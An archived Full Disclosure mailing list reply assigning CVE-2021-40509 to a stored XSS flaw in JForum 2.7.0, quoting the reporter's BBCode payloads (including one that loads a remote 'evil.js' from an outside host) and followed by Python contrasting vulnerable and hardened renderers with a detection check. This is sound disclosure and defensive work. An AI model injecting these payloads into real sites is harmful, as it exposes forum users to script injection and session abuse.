Full Disclosure mailing list archives
Re: a xss vulnerability in Jforum 2.7.0
From: Henri Salo <henri () nerv fi>
Date: Tue, 7 Sep 2021 10:44:43 +0300
On Thu, Sep 02, 2021 at 04:55:24PM +0800, kun song wrote:
> Hi, I found a vulnerability in JForum 2.7.0. It is a stored cross-site scripting vulnerability. The place is the user's profile (signature). The technique of the vulnerability is the same as that described in this article, "STORED CROSS SITE SCRIPTING IN BBCODE" (https://mindedsecurity.com/advisories/msa130510/), and the PoC is:
>
> color tag:
>
> [color=red" onMouseOver="alert('xss')]XSS[/color]
> [color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js') ;"]XSS[/color]
>
> Renders into HTML:
>
> <font onmouseover="alert('xss')" color="red">XSS</font>
> <font onmouseover="$.getScript('http://192.168.45.148:8080/evil.js');" color="red">XSS</font>
>
> img tag:
>
> [img]/demo.jpg" onMouseOver="alert('xss')[/img]
>
> Renders into HTML:
>
> <img src="/demo.jpg" onmouseover="alert('xss')" alt="image">
>
> url= tag:
>
> [url='http://www.demo.com" onMouseOver="alert('xss')']test[/url]
>
> Renders into HTML:
>
> <a class="snap_shots" href="http://www.demo.com" onmouseover="alert('xss')" target="_blank">test</a>
>
> Through analysis, the forum has set the cookie to HttpOnly, but the attacker can use $.getScript to do some evil things.
>
> This vulnerability has been fixed in https://sourceforge.net/p/jforum2/code/934/ .
>
> Timeline:
>
> 2021-04-21 notified the JForum developer by e-mail
> 2021-04-22 JForum fixed the vulnerability and will include the fix in the next release
> 2021-09-02 sent this mail to bugtraq & fulldisclosure
CVE-2021-40509 has been assigned for this vulnerability.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40509

--
Henri Salo

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
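As an added illustration (not JForum's code and not from either mail), the following Python renders the three BBCode tags from the report in two ways: a vulnerable form that copies the tag parameter straight into an HTML attribute, reproducing the attribute breakout shown above, and a hardened form that HTML-escapes the parameter and checks it against an allowlist before emitting it. SAMPLES, SAFE_COLOR, SAFE_URL and has_event_handler are constructed for this example and are not part of JForum.

```python
import html
import re

# Constructed sample posts: the three payload shapes quoted in the report, plus a benign one.
SAMPLES = {
    "color": "[color=red\" onMouseOver=\"alert('xss')]XSS[/color]",
    "img": "[img]/demo.jpg\" onMouseOver=\"alert('xss')[/img]",
    "url": "[url='http://www.demo.com\" onMouseOver=\"alert('xss')']test[/url]",
    "benign": "[color=red]hi[/color] [img]/demo.jpg[/img] [url=https://example.org]x[/url]",
}
# One pattern for the three tags from the report; each parameter runs up to the first ']'.
TAG = re.compile(
    r"\[color=(?P<color>[^\]]*)\](?P<cbody>.*?)\[/color\]"
    r"|\[img\](?P<img>[^\]]*)\[/img\]"
    r"|\[url='?(?P<url>[^\]]*?)'?\](?P<ubody>.*?)\[/url\]", re.S)
# Allowlists for the hardened path: a colour keyword or hex value; an http(s) or site-relative URL.
SAFE_COLOR = re.compile(r"^(?:[A-Za-z]{1,20}|#[0-9A-Fa-f]{3,6})$")
SAFE_URL = re.compile(r"^(?:https?://|/)[^\s\"'<>]+$")

def _render(text, hardened):
    # hardened=False mimics the defect: the parameter lands in the attribute untouched, so '"' breaks out.
    esc = (lambda s: html.escape(s, quote=True)) if hardened else (lambda s: s)
    out, pos = [], 0
    for m in TAG.finditer(text):
        out.append(esc(text[pos:m.start()]))  # plain text between tags
        pos = m.end()
        if m.group("color") is not None:
            param, body, fmt, ok = m.group("color"), m.group("cbody"), '<font color="%s">%s</font>', SAFE_COLOR
        elif m.group("img") is not None:
            param, body, fmt, ok = m.group("img"), "", '<img src="%s" alt="image">%s', SAFE_URL
        else:
            param, body, fmt, ok = m.group("url"), m.group("ubody"), '<a href="%s" target="_blank">%s</a>', SAFE_URL
        if hardened and not ok.match(param):
            out.append(esc(m.group(0)))  # rejected parameter: keep the whole tag as literal text
        else:
            # Escaping alone stops the breakout ('"' -> '&quot;'); the allowlist also blocks
            # javascript: URLs and anything else that is neither a colour nor a URL.
            out.append(fmt % (esc(param), esc(body)))
    out.append(esc(text[pos:]))
    return "".join(out)

def render_vulnerable(text):
    return _render(text, hardened=False)

def render_hardened(text):
    return _render(text, hardened=True)

def has_event_handler(rendered):
    # Coarse check on rendered HTML: an on* attribute inside a tag never comes from legitimate BBCode.
    return re.search(r"<[^>]*\son[a-z]+\s*=", rendered, re.I) is not None
```

The vulnerable renderer reproduces the attribute injection for all three payloads (attribute order differs from the report's output), while the hardened one renders the benign post identically and shows the three malformed tags as inert text.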
Current thread:
- a xss vulnerability in Jforum 2.7.0 kun song (Sep 03)
- Re: a xss vulnerability in Jforum 2.7.0 Henri Salo (Sep 07)